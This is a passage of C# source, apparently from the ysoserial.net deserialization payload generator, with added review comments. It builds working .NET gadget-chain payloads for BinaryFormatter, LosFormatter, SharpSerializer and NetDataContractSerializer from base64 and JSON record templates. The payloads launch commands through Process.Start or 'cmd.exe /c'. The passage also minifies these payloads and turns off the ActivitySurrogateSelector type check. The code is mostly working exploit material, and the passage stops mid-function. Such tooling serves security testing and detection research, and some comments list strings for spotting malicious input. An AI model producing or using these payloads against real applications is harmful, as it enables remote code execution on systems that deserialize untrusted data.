/// <summary>
/// Rebuilds a stream from its AdvancedBinaryFormatterParser JSON form and hands the bytes to
/// <c>SerializersHelper.BinaryFormatter_deserialize</c> to check that the call completes.
/// </summary>
/// <param name="strJson">JSON representation of the stream to rebuild.</param>
/// <param name="showInfo">When true, a message is printed if the call does not finish in time.</param>
/// <returns>
/// <c>true</c> only when the stream was rebuilt and the helper returned within five seconds
/// without throwing; <c>false</c> on any exception or on timeout.
/// </returns>
/// <remarks>
/// The helper runs inside this process on a thread-pool task. On timeout the task is abandoned,
/// not cancelled, so it may still be running after this method has returned.
/// NOTE(review): the helper presumably performs a real BinaryFormatter deserialization, in which
/// case whatever the stream encodes is triggered on the machine running this check - confirm.
/// </remarks>
private static bool BinaryFormatterDeserializeABFJson(string strJson, bool showInfo)
{
    bool deserializedCleanly = true;

    try
    {
        MemoryStream rebuiltStream = AdvancedBinaryFormatterParser.JsonToStream(strJson);

        // Run on a worker so that input which makes the formatter spin cannot hang the caller.
        // A failure inside the worker is reported through the captured flag.
        Task worker = Task.Run(() =>
        {
            try
            {
                SerializersHelper.BinaryFormatter_deserialize(rebuiltStream.ToArray());
            }
            catch (Exception)
            {
                deserializedCleanly = false;
            }
        });

        bool finishedInTime = worker.Wait(TimeSpan.FromSeconds(5));
        if (!finishedInTime)
        {
            deserializedCleanly = false;
            if (showInfo)
            {
                Console.WriteLine("The formatter is not responding - infinite loop because of parameters.");
            }
        }
    }
    catch (Exception)
    {
        // Covers a JSON form that cannot be turned back into a stream.
        deserializedCleanly = false;
    }

    return deserializedCleanly;
}
/// <summary>
/// Stream front end of the minifier: converts the input stream to JSON, passes it to
/// <c>MinimiseJsonAndRun</c>, and converts the returned JSON back into a stream.
/// </summary>
/// <param name="binaryFormatted">Stream to minimise; its <c>Length</c> is read for the size report.</param>
/// <param name="inInputArgs">Passed through unchanged to <c>MinimiseJsonAndRun</c>.</param>
/// <param name="isErrOk">Passed through unchanged to <c>MinimiseJsonAndRun</c>.</param>
/// <param name="showInfo">Passed through, and also enables the size report printed here.</param>
/// <returns>The minimised stream, positioned at its start.</returns>
public static MemoryStream MinimiseBFAndRun(Stream binaryFormatted, InputArgs inInputArgs, bool isErrOk, bool showInfo)
{
    string originalJson = AdvancedBinaryFormatterParser.StreamToJson(binaryFormatted);
    string minimisedJson = MinimiseJsonAndRun(originalJson, inInputArgs, isErrOk, showInfo);
    MemoryStream minimised = AdvancedBinaryFormatterParser.JsonToStream(minimisedJson);

    if (showInfo)
    {
        long sizeBefore = binaryFormatted.Length;
        long sizeAfter = minimised.Length;
        Console.WriteLine("Size reduced from " + sizeBefore + " to " + sizeAfter);
    }

    // Rewind so the caller can read the result straight away.
    minimised.Position = 0;
    return minimised;
}
// Worked example: this routine was used to minify the TypeConfuseDelegateGenerator payload.
// It generates the BinaryFormatter bytes, runs them through BinaryFormatterMinifier and prints
// the minimised bytes decoded as UTF-8, then blocks on Console.ReadLine().
// NOTE(review): MinimiseBFAndRun presumably deserializes candidate payloads while minimising,
// which would launch the sample command on this machine - confirm before running.
private void MinimiseTCDJsonAndRun()
{
    bool tolerateErrors = false;
    string targetApp = "TestConsoleApp_YSONET";
    sampleInputArgs = new InputArgs(targetApp + " /foo bar", true, false, false, false, true, null);

    TypeConfuseDelegateGenerator payloadSource = new TypeConfuseDelegateGenerator();
    byte[] serialized = (byte[])payloadSource.GenerateWithNoTest("binaryformatter", sampleInputArgs);

    // Kept from the original: the JSON view is produced but nothing below reads it.
    string jsonView = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(serialized), false, true, true);

    byte[] minimised = BinaryFormatterMinifier.MinimiseBFAndRun(serialized, sampleInputArgs, tolerateErrors, true);
    string printable = Encoding.UTF8.GetString(minimised);
    Console.WriteLine(printable);
    Console.ReadLine();
}
// Worked example: minimises the BinaryFormatter output of TextFormattingRunPropertiesGenerator
// through its JSON form and prints the byte size before and after, then blocks on
// Console.ReadLine().
// NOTE(review): MinimiseJsonAndRun presumably deserializes candidate payloads while minimising,
// which would launch the sample command on this machine - confirm before running.
private void TextFormatterMinifying()
{
    bool tolerateErrors = false;
    string targetApp = "TestConsoleApp_YSONET";
    sampleInputArgs = new InputArgs(targetApp + " /foo bar", true, false, true, true, true, null);

    TextFormattingRunPropertiesGenerator payloadSource = new TextFormattingRunPropertiesGenerator();
    byte[] serialized = (byte[])payloadSource.GenerateWithNoTest("binaryformatter", sampleInputArgs);
    Console.WriteLine("Init size: " + serialized.Length);

    string fullJson = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(serialized), false, true, true);
    string minimisedJson = BinaryFormatterMinifier.MinimiseJsonAndRun(fullJson, sampleInputArgs, tolerateErrors, true);
    Console.WriteLine(minimisedJson);

    // Convert back to a stream only to measure the final size.
    MemoryStream minimisedStream = AdvancedBinaryFormatterParser.JsonToStream(minimisedJson);
    Console.WriteLine("Final size: " + minimisedStream.Length);
    Console.ReadLine();
}
// Worked example: serializes the gadget chains of PayloadClass with a BinaryFormatter that uses
// MySurrogateSelector, minimises the result through its JSON form and prints the byte size
// before and after, then blocks on Console.ReadLine().
// NOTE(review): MinimiseJsonAndRun presumably deserializes candidate payloads while minimising,
// which would launch the sample command on this machine - confirm before running.
private void ActivitySurrogateSelector()
{
    bool tolerateErrors = false;
    string targetApp = "TestConsoleApp_YSONET";
    sampleInputArgs = new InputArgs(targetApp + " /foo bar", true, true, true, true, true, null);

    PayloadClass chainSource = new PayloadClass(1, sampleInputArgs);
    List<object> gadgetChains = chainSource.GadgetChains();

    // Disable ActivitySurrogate type protections during generation. The setting is written to
    // this process's AppSettings and nothing in this method restores it afterwards.
    ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");

    MemoryStream serializedChains = new MemoryStream();
    var binaryFormatter = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
    {
        SurrogateSelector = new MySurrogateSelector()
    };
    binaryFormatter.Serialize(serializedChains, gadgetChains);

    byte[] serialized = serializedChains.ToArray();
    Console.WriteLine("Init size: " + serialized.Length);

    string fullJson = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(serialized), false, true, true);
    string minimisedJson = BinaryFormatterMinifier.MinimiseJsonAndRun(fullJson, sampleInputArgs, tolerateErrors, true);
    Console.WriteLine(minimisedJson);

    // Convert back to a stream only to measure the final size.
    MemoryStream minimisedStream = AdvancedBinaryFormatterParser.JsonToStream(minimisedJson);
    Console.WriteLine("Final size: " + minimisedStream.Length);
    Console.ReadLine();
}
/// <summary>
/// Builds the SharpSerializer binary payload for a command by splicing the command text into a
/// fixed, pre-serialized ObjectDataProvider template.
/// </summary>
/// <param name="command">The command; <c>null</c> is treated as an empty string.</param>
/// <returns>The payload byte array.</returns>
/// <remarks>
/// Layout of the result: template head, 7-bit-encoded length, the ASCII bytes of "/c ", the ASCII
/// bytes of the command, template tail. The length covers "/c " plus the command and is counted
/// in bytes after ASCII encoding, so a character outside ASCII is emitted as '?'.
///
/// The template is constant, so every payload produced here carries the same markers shown in
/// the dump below (the assembly-qualified names of ObjectDataProvider and
/// System.Diagnostics.Process, "cmd.exe" and "Start"); those strings are what a check on
/// untrusted SharpSerializer input can match on.
///
/// Standard SharpSerializer version of ObjectDataProvider "calc" serialized object hex view:
///
/// 00000000 01 06 01 04 52 6F 6F 74 01 0E 4F 62 6A 65 63 74 ....Root..Object
/// 00000010 49 6E 73 74 61 6E 63 65 01 09 53 74 61 72 74 49 Instance..StartI
/// 00000020 6E 66 6F 01 08 46 69 6C 65 4E 61 6D 65 01 09 41 nfo..FileName..A
/// 00000030 72 67 75 6D 65 6E 74 73 01 0A 4D 65 74 68 6F 64 rguments..Method
/// 00000040 4E 61 6D 65 01 03 01 80 01 53 79 73 74 65 6D 2E Name...€.System.
/// 00000050 57 69 6E 64 6F 77 73 2E 44 61 74 61 2E 4F 62 6A Windows.Data.Obj
/// 00000060 65 63 74 44 61 74 61 50 72 6F 76 69 64 65 72 2C ectDataProvider,
/// 00000070 20 50 72 65 73 65 6E 74 61 74 69 6F 6E 46 72 61  PresentationFra
/// 00000080 6D 65 77 6F 72 6B 2C 20 56 65 72 73 69 6F 6E 3D mework, Version=
/// 00000090 34 2E 30 2E 30 2E 30 2C 20 43 75 6C 74 75 72 65 4.0.0.0, Culture
/// 000000A0 3D 6E 65 75 74 72 61 6C 2C 20 50 75 62 6C 69 63 =neutral, Public
/// 000000B0 4B 65 79 54 6F 6B 65 6E 3D 33 31 62 66 33 38 35 KeyToken=31bf385
/// 000000C0 36 61 64 33 36 34 65 33 35 01 65 53 79 73 74 65 6ad364e35.eSyste
/// 000000D0 6D 2E 44 69 61 67 6E 6F 73 74 69 63 73 2E 50 72 m.Diagnostics.Pr
/// 000000E0 6F 63 65 73 73 2C 20 53 79 73 74 65 6D 2C 20 56 ocess, System, V
/// 000000F0 65 72 73 69 6F 6E 3D 34 2E 30 2E 30 2E 30 2C 20 ersion=4.0.0.0,
/// 00000100 43 75 6C 74 75 72 65 3D 6E 65 75 74 72 61 6C 2C Culture=neutral,
/// 00000110 20 50 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D  PublicKeyToken=
/// 00000120 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 b77a5c561934e089
/// 00000130 00 02 00 00 01 02 02 01 01 01 01 01 01 02 01 02 ................
/// 00000140 01 02 01 02 06 01 03 01 02 01 07 63 6D 64 2E 65 ...........cmd.e
/// 00000150 78 65 06 01 04 01 02 01 07 2F 63 20 63 61 6C 63 xe......./c calc
/// 00000160 06 01 05 01 02 01 05 53 74 61 72 74             .......Start
/// </remarks>
internal static byte[] GenerateSharpSerializerBinaryPayload(string command)
{
    string effectiveCommand = command ?? string.Empty;

    // Template head: everything up to the point where the argument string's length goes.
    byte[] templateHead = Convert.FromBase64String("" +
        "AQYBBFJvb3QBDk9iamVjdEluc3RhbmNlAQlTdGFydEluZm8BCEZpbGVOYW1lAQlB" +
        "cmd1bWVudHMBCk1ldGhvZE5hbWUBAwGAAVN5c3RlbS5XaW5kb3dzLkRhdGEuT2Jq" +
        "ZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249" +
        "NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1" +
        "NmFkMzY0ZTM1AWVTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBW" +
        "ZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49" +
        "Yjc3YTVjNTYxOTM0ZTA4OQACAAABAgIBAQEBAQECAQIBAgECBgEDAQIBB2NtZC5l" +
        "eGUGAQQBAgE=");

    // Variable middle: [7-bit-encoded length]["/c "][<cmd>]
    byte[] argumentPrefix = Encoding.ASCII.GetBytes("/c ");
    byte[] commandBytes = Encoding.ASCII.GetBytes(effectiveCommand);
    int argumentLength = argumentPrefix.Length + commandBytes.Length;
    IEnumerable<byte> lengthPrefix = AdvancedBinaryFormatterParser.Calculate7BitEncodedInt(argumentLength);

    // Template tail: the remainder of the pre-serialized object.
    byte[] templateTail = Convert.FromBase64String(
        "BgEFAQIBBVN0YXJ0");

    IEnumerable<byte>[] orderedParts =
    {
        templateHead,
        lengthPrefix,
        argumentPrefix,
        commandBytes,
        templateTail
    };

    List<byte> assembled = new List<byte>();
    foreach (IEnumerable<byte> part in orderedParts)
    {
        assembled.AddRange(part);
    }

    return assembled.ToArray();
}
/// <summary>
/// Builds the ResourceSet-rooted payload for the requested formatter from hand-written
/// templates instead of serializing a live object.
/// </summary>
/// <param name="formatter">
/// "binaryformatter", "losformatter" or "netdatacontractserializer", compared case-insensitively.
/// </param>
/// <param name="inputArgs">
/// Supplies the command file name and arguments and the Minify, UseSimpleType and Test switches
/// read below. Its CmdType is overwritten with XML in the NetDataContractSerializer branch, so
/// the caller's object is modified.
/// </param>
/// <returns>
/// A byte[] for binaryformatter and losformatter; an XML string for netdatacontractserializer.
/// </returns>
/// <exception cref="Exception">The formatter name is none of the three listed above.</exception>
/// <remarks>
/// The member <c>internalgadget</c> (declared outside this method) selects the template: 1 uses
/// the SortedSet / ComparisonComparer / DelegateSerializationHolder chain, any other value wraps
/// a XAML string in TextFormattingRunProperties.
/// When <c>inputArgs.Test</c> is set, the finished payload is deserialized in this process with
/// the matching formatter, so whatever it encodes is triggered on the machine running the
/// generator; exceptions from that step are passed to Debugging.ShowErrors and not rethrown.
/// The type names written into the templates (System.Resources.ResourceSet,
/// System.Collections.Hashtable, System.DelegateSerializationHolder,
/// Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties) are the ones to look for
/// when inspecting untrusted serialized input.
/// </remarks>
public override object Generate(string formatter, InputArgs inputArgs)
{
    /*
     * // This is how ResourceSet can be used directly but the payload would fire!
     * object generatedPayload = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs);
     *
     * using (ResourceWriter rw = new ResourceWriter(@".\ResourceSetGenerator.resources"))
     * {
     *     rw.AddResource("", generatedPayload);
     *     rw.Generate();
     *     rw.Close();
     * }
     *
     * // Payload will be executed once here which is annoying but without surgical insertion or something to parse binaryformatter objects, it is quite hard to prevent this
     * ResourceSet myResourceSet = new ResourceSet(@".\ResourceSetGenerator.resources");
     *
     * // TextFormattingRunPropertiesGenerator is the preferred method due to its short length. However, we need to insert it manually into a serialized object as ResourceSet cannot tolerate it
     *
     * //*/

    //TestMore(inputArgs);

    if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
    {
        string payload = "";
        // The stream is assembled from a template (not by serializing a live object) to prevent
        // code execution while the generator itself is running.
        byte[] bfSerializedObj;
        if (internalgadget == 1)
        {
            // This is an example of using SimpleBinaryFormatterParser.
            // Records 25 and 26 of the template hold the command arguments and the command file
            // name; their type/value bytes are computed here and spliced in as base64.
            string obj25Type = "", obj25Value = "", obj26Value = "";
            byte[] cmdFile7bitLV = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdFileName);
            byte[] obj26ValueObjId = new byte[] { 0x0c, 0, 0, 0 };
            obj26Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj26ValueObjId, cmdFile7bitLV));
            if (inputArgs.HasArguments)
            {
                // With arguments: record 25 uses type byte 0x06 followed by id 0x0b and the
                // length-prefixed argument string.
                byte[] obj25TypeByte = new byte[] { 0x06 };
                byte[] obj25ValueObjId = new byte[] { 0x0b, 0, 0, 0 };
                byte[] cmdArgs7bitLV = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdArguments);
                obj25Type = Convert.ToBase64String(obj25TypeByte);
                obj25Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj25ValueObjId, cmdArgs7bitLV));
            }
            else
            {
                // Without arguments: record 25 uses type byte 0x09 and only a 4-byte id (0x05).
                // NOTE(review): this looks like a reference to the empty string already present
                // as object 5 (record 13) - confirm against the BinaryFormatter record types.
                byte[] obj25TypeByte = new byte[] { 0x09 };
                byte[] obj25ValueObjId = new byte[] { 0x05, 0, 0, 0 };
                obj25Type = Convert.ToBase64String(obj25TypeByte);
                obj25Value = Convert.ToBase64String(obj25ValueObjId);
            }
            payload = @"{'headerBytes':'AAEAAAD/////AQAAAAAAAAA=','binaryFormatterObjects':[{'orderId':1,'typeBytes':'BA==','valueBytes':'AQAAABxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlU2V0AgAAAAVUYWJsZRVfY2FzZUluc2Vuc2l0aXZlVGFibGUDAxxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlHFN5c3RlbS5Db2xsZWN0aW9ucy5IYXNodGFibGU='},{'orderId':2,'typeBytes':'CQ==','valueBytes':'AgAAAA=='},{'orderId':3,'typeBytes':'Cg==','valueBytes':''},{'orderId':4,'typeBytes':'BA==','valueBytes':'AgAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgg='},{'orderId':5,'typeBytes':null,'valueBytes':'7FE4Pw=='},{'orderId':6,'typeBytes':null,'valueBytes':'AQAAAA=='},{'orderId':7,'typeBytes':'Cg==','valueBytes':''},{'orderId':8,'typeBytes':'Cg==','valueBytes':''},{'orderId':9,'typeBytes':null,'valueBytes':'AwAAAA=='},{'orderId':10,'typeBytes':'CQ==','valueBytes':'AwAAAA=='},{'orderId':11,'typeBytes':'CQ==','valueBytes':'BAAAAA=='},{'orderId':12,'typeBytes':'EA==','valueBytes':'AwAAAAEAAAA='},{'orderId':13,'typeBytes':'Bg==','valueBytes':'BQAAAAA='},{'orderId':14,'typeBytes':'EA==','valueBytes':'BAAAAAEAAAA='},{'orderId':15,'typeBytes':'CQ==','valueBytes':'BgAAAA=='},{'orderId':16,'typeBytes':'DA==','valueBytes':'BwAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':17,'typeBytes':'BQ==','valueBytes':'BgAAAEBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Tb3J0ZWRTZXRgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABghJU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuQ29tcGFyaXNvbkNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdXQgHAAAA'},{'orderId':18,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orderId':19,'typeBytes':'CQ==','valueBytes':'CAAAAA=='},{'orderId':20,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orderId':21,'typeBytes':'CQ==','valueBytes':'CQAAAA=='},{'orderId':22,'typeBytes':'BA==','valueBytes':'CAAAAElTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dAQAAAAtfY29tcGFyaXNvbgMiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcg=='},{'orderId':23,'typeBytes':'CQ==','valueBytes':'CgAAAA=='},{'orderId':24,'typeBytes':'EQ==','valueBytes':'CQAAAAIAAAA='},{'orderId':25,'typeBytes':'" + obj25Type + @"','valueBytes':'" + obj25Value + @"'},{'orderId':26,'typeBytes':'Bg==','valueBytes':'" + obj26Value + @"'},{'orderId':27,'typeBytes':'BA==','valueBytes':'CgAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVy'},{'orderId':28,'typeBytes':'CQ==','valueBytes':'DQAAAA=='},{'orderId':29,'typeBytes':'CQ==','valueBytes':'DgAAAA=='},{'orderId':30,'typeBytes':'CQ==','valueBytes':'DwAAAA=='},{'orderId':31,'typeBytes':'BA==','valueBytes':'DQAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQ=='},{'orderId':32,'typeBytes':'Bg==','valueBytes':'EAAAAKQBU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl0sW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyxTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0='},{'orderId':33,'typeBytes':'Bg==','valueBytes':'EQAAAAhtc2NvcmxpYg=='},{'orderId':34,'typeBytes':'Cg==','valueBytes':''},{'orderId':35,'typeBytes':'Bg==','valueBytes':'EgAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':36,'typeBytes':'Bg==','valueBytes':'EwAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzcw=='},{'orderId':37,'typeBytes':'Bg==','valueBytes':'FAAAAAVTdGFydA=='},{'orderId':38,'typeBytes':'CQ==','valueBytes':'FQAAAA=='},{'orderId':39,'typeBytes':'BA==','valueBytes':'DgAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgYAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAAMIDVN5c3RlbS5UeXBlW10='},{'orderId':40,'typeBytes':'CQ==','valueBytes':'FAAAAA=='},{'orderId':41,'typeBytes':'CQ==','valueBytes':'EgAAAA=='},{'orderId':42,'typeBytes':'CQ==','valueBytes':'EwAAAA=='},{'orderId':43,'typeBytes':'Bg==','valueBytes':'GQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQ=='},{'orderId':44,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':45,'typeBytes':'Cg==','valueBytes':''},{'orderId':46,'typeBytes':'AQ==','valueBytes':'DwAAAA4AAAA='},{'orderId':47,'typeBytes':'Bg==','valueBytes':'GgAAAAdDb21wYXJl'},{'orderId':48,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':49,'typeBytes':'Bg==','valueBytes':'HAAAAA1TeXN0ZW0uU3RyaW5n'},{'orderId':50,'typeBytes':'Bg==','valueBytes':'HQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcp'},{'orderId':51,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':52,'typeBytes':'Cg==','valueBytes':''},{'orderId':53,'typeBytes':'AQ==','valueBytes':'FQAAAA0AAAA='},{'orderId':54,'typeBytes':'Bg==','valueBytes':'HgAAAC1TeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0='},{'orderId':55,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':56,'typeBytes':'Cg==','valueBytes':''},{'orderId':57,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':58,'typeBytes':'CQ==','valueBytes':'HAAAAA=='},{'orderId':59,'typeBytes':'CQ==','valueBytes':'GgAAAA=='},{'orderId':60,'typeBytes':'Cg==','valueBytes':''},{'orderId':61,'typeBytes':'Cw==','valueBytes':''}]}";
            bfSerializedObj = SimpleBinaryFormatterParser.JsonToStream(payload).ToArray();
        }
        else
        {
            // This is an example of using AdvancedBinaryFormatterParser which is recommended over SimpleBinaryFormatterParser but it is much longer
            // In this gadget however, this feels like cheating as System.Resources.ResourceSet can be replaced by anything given the TextFormattingRunProperties gadget triggers first
            ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator();
            string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString();
            if (inputArgs.Minify)
            {
                xaml_payload = XMLMinifier.Minify(xaml_payload, null, null);
            }
            // Escape before splicing: the XAML is placed inside a single-quoted JSON string below.
            xaml_payload = CommandArgSplitter.JsonStringEscape(xaml_payload);
            // This payload has been minified manually too by removing some of the unnecessary items!
            payload = @"[{'Id': 1, 'Data': { '$type': 'SerializationHeaderRecord', 'binaryFormatterMajorVersion': 1, 'binaryFormatterMinorVersion': 0, 'binaryHeaderEnum': 0, 'topId': 1, 'headerId': -1, 'majorVersion': 1, 'minorVersion': 0 }},{'Id': 2, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 1, 'name': 'System.Resources.ResourceSet', 'numMembers': 2, 'memberNames':['',''], 'binaryTypeEnumA':[3,3], 'typeInformationA':[null,null], 'typeInformationB':['',''], 'memberAssemIds':[0,0], 'assemId': 0 }},{'Id': 3, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 2 }},{'Id': 4, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 1 }},{'Id': 5, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 2, 'name': 'System.Collections.Hashtable', 'numMembers': 5, 'memberNames':['LoadFactor','Version','Comparer','','HashSize'], 'binaryTypeEnumA':[0,0,3,3,0], 'typeInformationA':[11,8,null,null,8], 'typeInformationB':[11,8,'','',8], 'memberAssemIds':[0,0,0,0,0], 'assemId': 0 }},{'Id': 6, 'TypeName': 'Single', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 11, 'value': 0 }},{'Id': 7, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 1 }},{'Id': 8, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 1 }},{'Id': 9, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 1 }},{'Id': 10, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 3 }},{'Id': 11, 'TypeName': 'Assembly', 'Data': { '$type': 'BinaryAssembly', 'assemId': 7, 'assemblyString': 'Microsoft.PowerShell.Editor' }},{'Id': 12, 'TypeName': 'ObjectWithMapTypedAssemId', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 5, 'objectId': 6, 'name': 'Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties', 'numMembers': 1, 'memberNames':['ForegroundBrush'], 'binaryTypeEnumA':[1], 'typeInformationA':[null], 'typeInformationB':[null], 'memberAssemIds':[0], 'assemId': 7 }},{'Id': 13, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 8, 'value': '" + xaml_payload + @"' }},{'Id': 14, 'TypeName': 'MessageEnd', 'Data': { '$type': 'MessageEnd' }}]";
            bfSerializedObj = AdvancedBinaryFormatterParser.JsonToStream(payload).ToArray();
        }
        if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
        {
            if (inputArgs.Test)
            {
                // Self-test: deserializes the payload in this process, which triggers it here.
                try
                {
                    MemoryStream ms = new MemoryStream(bfSerializedObj);
                    ms.Position = 0;
                    System.Runtime.Serialization.Formatters.Binary.BinaryFormatter bf = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
                    bf.Deserialize(ms);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return(bfSerializedObj);
        }
        else
        {
            // it is LosFormatter: the BinaryFormatter bytes are converted, not regenerated.
            byte[] lfSerializedObj = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(bfSerializedObj);
            // The stream is created even when Test is off; it is only read by the self-test.
            MemoryStream ms = new MemoryStream(lfSerializedObj);
            ms.Position = 0;
            if (inputArgs.Test)
            {
                // Self-test: deserializes the payload in this process, which triggers it here.
                try
                {
                    System.Web.UI.LosFormatter lf = new System.Web.UI.LosFormatter();
                    lf.Deserialize(ms);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return(lfSerializedObj);
        }
        //return Serialize(myResourceSet, formatter, inputArgs);
    }
    else if (formatter.Equals("netdatacontractserializer", StringComparison.OrdinalIgnoreCase))
    {
        // Mutates the caller's InputArgs.
        // NOTE(review): presumably this makes CmdFileName / CmdArguments return XML-escaped
        // text, which the concatenations below rely on - confirm in InputArgs.
        inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
        string ndcPayload = "";
        if (internalgadget == 1)
        {
            // The two <c:string> items are emitted as arguments first, file name second; with
            // no arguments the first item is written as a nil element.
            string cmdPart = "";
            if (inputArgs.HasArguments)
            {
